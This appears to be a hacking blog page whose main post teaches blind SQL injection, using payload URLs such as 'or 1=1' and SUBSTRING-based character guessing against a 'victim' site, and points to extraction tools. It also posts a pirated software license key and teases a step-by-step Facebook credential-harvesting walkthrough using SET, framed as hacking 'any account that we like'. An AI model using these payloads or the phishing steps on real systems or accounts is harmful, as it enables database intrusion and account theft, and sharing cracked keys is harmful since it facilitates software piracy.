Anonymous voice changer. how it works.

-
Image
Hello, Guys am sure you have wondered what kinda voice do the  Anonymous uses when broadcasting on air, and you may have also tried your hands to download some of the voice changers applications, which resemble with real anonymous voice, and today will show you the exact voice changing machine that actual anonymous hackers use today. The Anonymous voice changer download link;  here Use the key below to Activate it. Register Name: www.serials.ws Register Company name: www.serials.ws The Registerd Lisence key: AA-15F01A-9719E1-EC031E-4C97F2-65ACA8 PLEAS TAKE Note: I Don't Make Any Copyright Infringements.
Post a Comment

BLIND SQL INJECTIONS

-

SQL injection is a well know and exploited technique that mainly exploited in web enviroment.sql injections allows an attacker to reach the database.
which ask the database true or false questions and determine the answer
based on the system's response.

examples of SQL injections

http://victim/listproducts.asp?cat=books
SELECT * from PRODUCTS WHERE category=‘books’

http://victim/listproducts.asp?cat=books’ or ‘1’=‘1
SELECT * from PRODUCTS WHERE category=‘books’ or ‘1’=‘1’

Basically, on SQL injection the attacker gets results.



Blind sql injections

Same vulnerability as SQL injection
*Very* common vulnerability
Sometimes (wrongly) ignored during tests as unexploitable or not detected
The attacker can not retrieve results
The attacker can only retrieve a True/False condition

example. of blind sql injections

http://victim/showproduct.asp?id=238

SELECT * from PRODUCTS WHERE id=238
Sometimes, due to the code surrounding the SQL query (grouped or sorted) the attacker can’t UNION and no ‘good’ ways of exploitation are found
http://victim/showproduct.asp?id=238 and 1=1
http://victim/showproduct.asp?id=238 and 1=2
SELECT * from PRODUCTS WHERE id=238 and 1=1
SELECT * from PRODUCTS WHERE id=238 and 1=2

Blind SQL happens if the requests above return different results


Exploiting True/False conditions
Select user returns ‘dbo’
SUBSTRING(‘Select user’, 1, 1) = ‘d’
SUBSTRING(‘Select user’, 2, 1) = ‘b’
SUBSTRING(‘Select user’, 3, 1) = ‘o’

http://victim/showproduct.asp?id=238 and SUBSTRING(‘Select user’, 1, 1) = ‘d’   TRUE
http://victim/showproduct.asp?id=238 and SUBSTRING(‘Select user’, 1, 1) = ‘X’  FALSE


Available solutions

Custom Script: We can script it and discover each letter
Set a space: [a-z] + [A-Z] + [0-9] + [symbols]
Loop for every character
Absinthe
http://www.0x90.org/releases/absinthe/
BSQLBF
http://www.unsec.net/download/bsqlbf.pl 
http://www.unsec.net/download/bsqlbf.avi
SQLMap, SQLBrute.py
#cybersecurity #hacking #security #technology #hacker #infosec #tech #ethicalhacking #programming #linux #hackers #cyber #kalilinux #cybercrime #malware #python #privacy #it #iot #cyberattack #coding #dataprotection #hack #ethicalhacker #networking #informationsecurity #cybersecurityawareness #programmer #datasecurity #bhfyp #nasvera #sql #cyber


Comments

Post a Comment

Popular posts from this blog

INSTALLING VISUAL PARADIGM ON KALI LINUX

-
Image
                                                  Hello guys i'll be showing a simple way of installing Visual Paradigm on kali linux. 1. Dowload Vissual Paradigm form http://www.visual-paradigm.com/download/?platform=linux&arch=64bit 2. open the terminal use the following command to install, “ bash ./%Visual_Paradigm_13_0_20160203_Linux64.sh ” Not that when you use the command this way it will give an error saying “bash: ./%Visual_Paradigm_13_0_20160203_Linux64.sh: No such file or directory ” in other to use the “bash” command you need to specifies the directory  in which the file is in.
Read more

Things you need to Know About Nigeria’s Cybercrime Act 2015

-
This is a high-level overview of what the Cybercrime Act 2015 provides, and things we should be aware of. 1. Gives the President the power to designate certain computer systems, networks and information infrastructure vital to the national security of Nigeria or the economic and social well-being of its citizens, as constituting Critical National Information Infrastructure, and to implement procedures, guidelines, and conduct audits in furtherance of that. Examples of systems, which could be designated as such, include transport, communication, banking etc. To find out more about what such a plan should look like, you can check the USA’s National Infrastructure Protection Plan here, or the European Union’s here. 2. Prescribes the death penalty for an offence committed against a system or network that has been designated critical national infrastructure of Nigeria that results in the death of an individual (amongst other punishments for lesser crimes). 3. Hackers, if found guilty, of un...
Read more

Hacking Facebook Using Social Engineering Toolkit in Kali linux

-
Image
we are going to make use of Kali Linux, and the tool call SET (Social Engineering Toolkit). to hack any account that we like. so let get started now. The  ‘toolkit’ options we are going used   step 1 Social Engineering Attacks  step 2 Website Attack Vectors step  3 Credential Harvester Attack Method step  4 Web Templates step  5 Input the IP address step 6 Choose facebook First things first power on your Kali Linux machine and open up a  terminal and type in "setoolkit" and you will be shown a welcome screen and attack options to pick from. and we will pick number one coz we are performing social engineering. the next step is for us to click on the website attack options by typing in 2 thirdly we select options 3 which is credential harvester attack method. now we will choose a web site template of the website we want to attack which is Facebook  after which  then we have to set an attacker IP address which is our system. to check for ur...
Read more